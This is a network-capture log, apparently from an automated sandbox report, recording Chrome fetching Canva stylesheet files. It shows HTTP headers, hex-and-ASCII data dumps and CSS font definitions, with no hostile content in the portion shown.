                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC356INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 7a 62 36 34 78 52 70 4c 59 73 56 69 63 4e 57 50 4e 4e 6c 77 58 50 64 46 47 25 32 46 48 57 7a 54 46 25 32 42 71 58 68 71 54 6e 32 54 4d 65 47 6c 46 32 34 34 39 46 4f 66 56 45 51 58 63 59 37 34 70 76 49 46 53 4d 45 65 56 38 55 64 55 4e 59 35 41 51 46 4d 31 58 43 70 41 41 62 25 32 46 76 69 25 32 46 6a 72 50 77 56 79 69 47 63 6f 63 5a 4a 25 32 46 25 32 46 6e 76 4b 32 63 73 47 77 42 77 4e 4d 65 57 39 57 68 63 47 64 48 33 49 6f 77 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zb64xRpLYsVicNWPNNlwXPdFG%2FHWzTF%2BqXhqTn2TMeGlF2449FOfVEQXcY74pvIFSMEeV8UdUNY5AQFM1XCpAAb%2Fvi%2FjrPwVyiGcocZJ%2F%2FnvK2csGwBwNMeW9WhcGdH3Iow%3D"}],"group":"cf-nel","max_age":
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC170INData Raw: 0a 2f 2a 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 64 61 74 61 3a 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 62 61 73 65 36 34 2c 65 79 4a 32 5a 58 4a 7a 61 57 39 75 49 6a 6f 7a 4c 43 4a 7a 62 33 56 79 59 32 56 7a 49 6a 70 62 58 53 77 69 62 6d 46 74 5a 58 4d 69 4f 6c 74 64 4c 43 4a 74 59 58 42 77 61 57 35 6e 63 79 49 36 49 69 49 73 49 6d 5a 70 62 47 55 69 4f 69 49 35 4e 32 55 7a 4f 44 6c 6b 5a 54 63 7a 4e 44 63 7a 59 7a 49 30 4c 6d 78 30 63 69 35 6a 63 33 4d 69 66 51 3d 3d 20 2a 2f
                                                                                                                                                                                                                                                                    Data Ascii: /*# sourceMappingURL=data:application/json;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbXSwibmFtZXMiOltdLCJtYXBwaW5ncyI6IiIsImZpbGUiOiI5N2UzODlkZTczNDczYzI0Lmx0ci5jc3MifQ== */


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    22192.168.2.1249743104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC806OUTGET /web/777de1c5173d2119.ltr.css HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:34 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                    Content-Length: 13083
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950e8490e42ab-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49974
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "0f350106782eb085ff55517a53814244"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:20 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:18 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: hnbImcACk44BcNLN8LCX3b4vqzjk3aZbGGKl04rJgQaIBT2NrFjlA1qhVdVCw/3h0ExaiCiuY4DjqTHbHis5C0wDWgggGwE1
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8ZTQJEQRMTX3S5
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: DrBdYjz_VPOjcxRw6vnfBk9ZIebX4kbb
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC348INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 50 36 4c 6f 54 49 73 52 49 76 76 37 25 32 42 61 55 7a 30 4b 62 73 78 62 69 33 4a 57 6b 41 57 77 33 4a 46 51 52 71 71 4c 50 32 4b 45 57 79 61 43 75 70 76 49 48 6e 69 74 6e 66 7a 31 78 37 4d 6b 4f 49 68 63 34 6c 61 50 6e 6f 49 62 33 6e 47 78 61 69 6c 70 57 58 38 76 48 64 46 67 68 31 43 75 6a 64 48 32 33 35 50 64 77 33 46 56 71 62 4b 45 64 49 50 79 4b 6d 76 71 53 4b 74 4b 49 4e 71 78 6c 25 32 46 55 65 34 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P6LoTIsRIvv7%2BaUz0Kbsxbi3JWkAWw3JFQRqqLP2KEWyaCupvIHnitnfz1x7MkOIhc4laPnoIb3nGxailpWX8vHdFgh1CujdH235Pdw3FVqbKEdIPyKmvqSKtKINqxl%2FUe4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1187INData Raw: 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4e 6f 74 6f 20 53 61 6e 73 20 56 61 72 69 61 62 6c 65 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 31 32 35 20 39 35 30 3b 73 72 63 3a 75 72 6c 28 69 6d 61 67 65 73 2f 36 32 31 36 37 35 65 36 62 65 38 33 66 36 37 35 64 33 33 35 36 32 64 32 66 66 37 61 30 66 36 33 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 75 2b 30 36 3f 3f 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4e 6f 74 6f 20 53 61 6e 73 20 56 61 72 69 61 62 6c 65 3b 66 6f 6e 74 2d
                                                                                                                                                                                                                                                                    Data Ascii: @font-face{font-display:swap;font-family:Noto Sans Variable;font-style:normal;font-weight:125 950;src:url(images/621675e6be83f675d33562d2ff7a0f63.woff2) format("woff2");unicode-range:u+06??}@font-face{font-display:swap;font-family:Noto Sans Variable;font-
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 38 38 2c 75 2b 32 30 62 34 2c 75 2b 32 64 65 30 2d 32 64 66 66 2c 75 2b 61 36 34 30 2d 61 36 39 66 2c 75 2b 66 65 32 65 2d 66 65 32 66 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4e 6f 74 6f 20 53 61 6e 73 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 73 72 63 3a 75 72 6c 28 69 6d 61 67 65 73 2f 34 37 37 61 61 64 32 36 64 39 61 35 61 36 34 36 30 39 34 38 33 39 33 31 61 61 30 61 37 61 30 35 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 75 72 6c 28 69 6d 61 67 65 73 2f 30 65 32 62 65 37 62 66 36 37 65 33 32 37 35 35 66 64 37 33 61 36 30 35 61 32 61 66 64 31 33 62 2e 77 6f 66 66 29 20 66 6f 72
                                                                                                                                                                                                                                                                    Data Ascii: 88,u+20b4,u+2de0-2dff,u+a640-a69f,u+fe2e-fe2f}@font-face{font-display:swap;font-family:Noto Sans;font-style:normal;font-weight:600;src:url(images/477aad26d9a5a64609483931aa0a7a05.woff2) format("woff2"),url(images/0e2be7bf67e32755fd73a605a2afd13b.woff) for
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 67 65 73 2f 37 37 31 63 62 66 32 39 64 64 63 33 31 34 35 64 64 61 33 32 36 61 66 65 65 34 62 31 30 66 62 38 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 75 2b 30 34 30 30 2d 30 34 35 66 2c 75 2b 30 34 39 30 2d 30 34 39 31 2c 75 2b 30 34 62 30 2d 30 34 62 31 2c 75 2b 32 31 31 36 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4e 6f 74 6f 20 53 61 6e 73 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 73 72 63 3a 75 72 6c 28 69 6d 61 67 65 73 2f 36 63 39 62 39 66 34 62 32 38 33 32 32 63 37 34 37 33 36 36 37 65 30 66 63 31 36 39 30 36 37 35 2e 77 6f 66 66 32 29 20
                                                                                                                                                                                                                                                                    Data Ascii: ges/771cbf29ddc3145dda326afee4b10fb8.woff) format("woff");unicode-range:u+0400-045f,u+0490-0491,u+04b0-04b1,u+2116}@font-face{font-display:swap;font-family:Noto Sans;font-style:normal;font-weight:400;src:url(images/6c9b9f4b28322c7473667e0fc1690675.woff2)
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 66 61 6d 69 6c 79 3a 4e 6f 74 6f 20 53 61 6e 73 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 73 72 63 3a 75 72 6c 28 69 6d 61 67 65 73 2f 64 61 66 62 37 66 65 65 31 64 62 36 62 37 61 65 39 62 31 31 38 34 32 33 39 62 31 31 61 63 66 35 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 75 72 6c 28 69 6d 61 67 65 73 2f 64 36 63 62 62 35 63 34 32 61 31 31 34 39 65 33 38 65 31 66 62 37 61 32 33 38 30 33 32 62 63 38 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 75 2b 30 33 37 30 2d 30 33 66 66 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4e
                                                                                                                                                                                                                                                                    Data Ascii: family:Noto Sans;font-style:normal;font-weight:700;src:url(images/dafb7fee1db6b7ae9b1184239b11acf5.woff2) format("woff2"),url(images/d6cbb5c42a1149e38e1fb7a238032bc8.woff) format("woff");unicode-range:u+0370-03ff}@font-face{font-display:swap;font-family:N
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 30 30 37 61 2c 75 2b 30 30 37 63 2c 75 2b 30 30 61 30 2c 75 2b 30 30 61 37 2c 75 2b 30 30 61 39 2c 75 2b 30 30 63 30 2d 30 30 63 33 2c 75 2b 30 30 63 38 2d 30 30 63 61 2c 75 2b 30 30 63 63 2d 30 30 63 64 2c 75 2b 30 30 64 32 2d 30 30 64 35 2c 75 2b 30 30 64 39 2d 30 30 64 61 2c 75 2b 30 30 64 64 2c 75 2b 30 30 65 30 2d 30 30 65 33 2c 75 2b 30 30 65 38 2d 30 30 65 61 2c 75 2b 30 30 65 63 2d 30 30 65 64 2c 75 2b 30 30 66 32 2d 30 30 66 35 2c 75 2b 30 30 66 39 2d 30 30 66 61 2c 75 2b 30 30 66 64 2c 75 2b 30 31 30 32 2d 30 31 30 33 2c 75 2b 30 31 31 30 2d 30 31 31 31 2c 75 2b 30 31 32 38 2d 30 31 32 39 2c 75 2b 30 31 36 38 2d 30 31 36 39 2c 75 2b 30 31 61 30 2d 30 31 61 31 2c 75 2b 30 31 61 66 2d 30 31 62 30 2c 75 2b 30 33 30 30 2d 30 33 30 33 2c 75 2b 30 33
                                                                                                                                                                                                                                                                    Data Ascii: 007a,u+007c,u+00a0,u+00a7,u+00a9,u+00c0-00c3,u+00c8-00ca,u+00cc-00cd,u+00d2-00d5,u+00d9-00da,u+00dd,u+00e0-00e3,u+00e8-00ea,u+00ec-00ed,u+00f2-00f5,u+00f9-00fa,u+00fd,u+0102-0103,u+0110-0111,u+0128-0129,u+0168-0169,u+01a0-01a1,u+01af-01b0,u+0300-0303,u+03
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 30 30 64 64 2c 75 2b 30 30 65 30 2d 30 30 65 33 2c 75 2b 30 30 65 38 2d 30 30 65 61 2c 75 2b 30 30 65 63 2d 30 30 65 64 2c 75 2b 30 30 66 32 2d 30 30 66 35 2c 75 2b 30 30 66 39 2d 30 30 66 61 2c 75 2b 30 30 66 64 2c 75 2b 30 31 30 32 2d 30 31 30 33 2c 75 2b 30 31 31 30 2d 30 31 31 31 2c 75 2b 30 31 32 38 2d 30 31 32 39 2c 75 2b 30 31 36 38 2d 30 31 36 39 2c 75 2b 30 31 61 30 2d 30 31 61 31 2c 75 2b 30 31 61 66 2d 30 31 62 30 2c 75 2b 30 33 30 30 2d 30 33 30 33 2c 75 2b 30 33 30 36 2c 75 2b 30 33 30 39 2c 75 2b 30 33 31 62 2c 75 2b 30 33 32 33 2c 75 2b 31 65 61 30 2d 31 65 66 39 2c 75 2b 32 30 31 30 2d 32 30 31 31 2c 75 2b 32 30 31 33 2d 32 30 31 34 2c 75 2b 32 30 31 38 2d 32 30 31 39 2c 75 2b 32 30 31 63 2d 32 30 31 64 2c 75 2b 32 30 32 30 2d 32 30 32 31
                                                                                                                                                                                                                                                                    Data Ascii: 00dd,u+00e0-00e3,u+00e8-00ea,u+00ec-00ed,u+00f2-00f5,u+00f9-00fa,u+00fd,u+0102-0103,u+0110-0111,u+0128-0129,u+0168-0169,u+01a0-01a1,u+01af-01b0,u+0300-0303,u+0306,u+0309,u+031b,u+0323,u+1ea0-1ef9,u+2010-2011,u+2013-2014,u+2018-2019,u+201c-201d,u+2020-2021
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 5b 6c 61 6e 67 7c 3d 76 69 5d 20 2e 5f 35 52 53 71 49 67 2c 5b 6c 61 6e 67 7c 3d 76 69 5d 20 2e 5f 35 62 5f 36 6b 77 2c 5b 6c 61 6e 67 7c 3d 76 69 5d 20 2e 5f 37 6a 58 62 56 51 2c 5b 6c 61 6e 67 7c 3d 76 69 5d 20 2e 5f 74 33 44 6c 51 2c 5b 6c 61 6e 67 7c 3d 76 69 5d 20 2e 64 5a 5f 63 46 67 2c 5b 6c 61 6e 67 7c 3d 76 69 5d 20 2e 66 46 4f 69 4c 51 2c 5b 6c 61 6e 67 7c 3d 76 69 5d 20 2e 66 54 33 41 50 51 2c 5b 6c 61 6e 67 7c 3d 76 69 5d 20 2e 66 58 4f 44 4d 67 2c 5b 6c 61 6e 67 7c 3d 76 69 5d 20 2e 6c 6e 43 50 6f 41 2c 5b 6c 61 6e 67 7c 3d 76 69 5d 20 2e 6f 68 75 48 72 51 2c 5b 6c 61 6e 67 7c 3d 76 69 5d 20 2e 72 4e 75 71 52 41 2c 5b 6c 61 6e 67 7c 3d 76 69 5d 20 2e 74 59 49 30 56 77 2c 5b 6c 61 6e 67 7c 3d 76 69 5d 20 2e 77 70 36 5f 79 67 7b 66 6f 6e 74 2d
                                                                                                                                                                                                                                                                    Data Ascii: [lang|=vi] ._5RSqIg,[lang|=vi] ._5b_6kw,[lang|=vi] ._7jXbVQ,[lang|=vi] ._t3DlQ,[lang|=vi] .dZ_cFg,[lang|=vi] .fFOiLQ,[lang|=vi] .fT3APQ,[lang|=vi] .fXODMg,[lang|=vi] .lnCPoA,[lang|=vi] .ohuHrQ,[lang|=vi] .rNuqRA,[lang|=vi] .tYI0Vw,[lang|=vi] .wp6_yg{font-
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 74 2c 53 65 67 6f 65 20 55 49 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 76 61 72 69 61 74 69 6f 6e 2d 73 65 74 74 69 6e 67 73 3a 22 6f 70 73 7a 22 20 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 2e 6f 68 75 48 72 51 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 76 61 72 28 2d 2d 77 51 77 56 47 77 2c 20 2e 31 72 65 6d 29 2a 32 34 29 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 76 61 72 28 2d 2d 77 51 77 56 47 77 2c 20 2e 31 72 65 6d 29 2a 33 36 29 7d 2e 57 6a 79 73 47 51 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 76 61 72 28 2d 2d 77 51 77 56 47 77 2c 20 2e 31 72 65 6d 29 2a
                                                                                                                                                                                                                                                                    Data Ascii: t,Segoe UI,Helvetica,Arial,sans-serif;font-variation-settings:"opsz" 0;font-weight:400;margin:0;overflow-wrap:break-word}.ohuHrQ{font-size:calc(var(--wQwVGw, .1rem)*24);line-height:calc(var(--wQwVGw, .1rem)*36)}.WjysGQ{font-size:calc(var(--wQwVGw, .1rem)*
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 6e 43 50 6f 41 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 76 61 72 28 2d 2d 77 51 77 56 47 77 2c 20 2e 31 72 65 6d 29 2a 31 36 29 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 76 61 72 28 2d 2d 77 51 77 56 47 77 2c 20 2e 31 72 65 6d 29 2a 32 34 29 7d 2e 6f 68 75 48 72 51 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 76 61 72 28 2d 2d 77 51 77 56 47 77 2c 20 2e 31 72 65 6d 29 2a 32 31 29 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 76 61 72 28 2d 2d 77 51 77 56 47 77 2c 20 2e 31 72 65 6d 29 2a 33 32 29 7d 2e 57 6a 79 73 47 51 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 76 61 72 28 2d 2d 77 51 77 56 47 77 2c 20 2e 31 72 65 6d 29 2a 31 38 29 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 76 61 72 28 2d 2d 77 51 77 56 47 77
                                                                                                                                                                                                                                                                    Data Ascii: nCPoA{font-size:calc(var(--wQwVGw, .1rem)*16);line-height:calc(var(--wQwVGw, .1rem)*24)}.ohuHrQ{font-size:calc(var(--wQwVGw, .1rem)*21);line-height:calc(var(--wQwVGw, .1rem)*32)}.WjysGQ{font-size:calc(var(--wQwVGw, .1rem)*18);line-height:calc(var(--wQwVGw


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    23192.168.2.1249744104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC806OUTGET /web/9e2d4720ffac5af4.ltr.css HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:34 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                    Content-Length: 382
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950e84d124268-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 1568125
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "0eecba4c5eadf6a40cdc31dbab617af9"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:20 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Mon, 30 Sep 2024 01:24:54 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Wed, 01 Oct 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: rg+PJnmJG3scrEZBbVBY30Awn2uhuIFyagnTg+pVyJ4KDa5l6abpK9bAhlbdA2LN33pIh9N01CIDVy9eebYwGKoJ8DdTCVHp
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: S4W1JKW9G7NWQWRQ
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: DV_s7pMlxl.stgvmfdh.Pc0ecKSxqyKm
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC350INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 50 74 39 53 66 30 6e 33 44 69 74 74 7a 46 59 54 62 6e 4d 6b 72 35 54 50 58 65 6e 48 72 62 66 72 52 68 6b 25 32 46 77 6b 56 30 58 39 55 6c 38 45 61 38 4a 73 53 71 66 71 4e 43 6a 67 69 43 69 65 62 72 6d 6a 76 65 35 6f 31 4f 39 5a 67 62 62 54 49 70 6a 51 4f 41 76 79 6e 59 70 5a 61 59 35 76 59 35 66 43 55 25 32 46 68 30 46 77 77 52 56 4f 6e 62 6c 6d 6a 6b 25 32 46 6d 63 58 52 62 64 38 4c 36 57 51 6c 41 6f 53 59 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pt9Sf0n3DittzFYTbnMkr5TPXenHrbfrRhk%2FwkV0X9Ul8Ea8JsSqfqNCjgiCiebrmjve5o1O9ZgbbTIpjQOAvynYpZaY5vY5fCU%2Fh0FwwRVOnblmjk%2FmcXRbd8L6WQlAoSY%3D"}],"group":"cf-nel","max_age":604800
